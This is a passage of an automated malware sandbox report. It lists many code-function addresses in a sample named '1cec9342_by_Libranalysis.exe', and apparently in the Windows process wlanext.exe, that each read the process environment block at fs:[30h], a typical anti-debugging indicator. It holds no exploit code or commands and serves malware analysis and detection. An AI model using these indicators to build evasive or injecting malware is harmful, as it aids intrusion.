          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A15210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A33A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00ACB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00ACB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00ADEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AA4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AD138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00ACD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A42397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A3DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AD131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A1DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AD14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ACFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ACFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A48E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A28794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038C138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038BD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03811B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03811B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03834BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03834BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03834BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038C131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D8B58 mov eax, dword ptr fs:[00000030h]
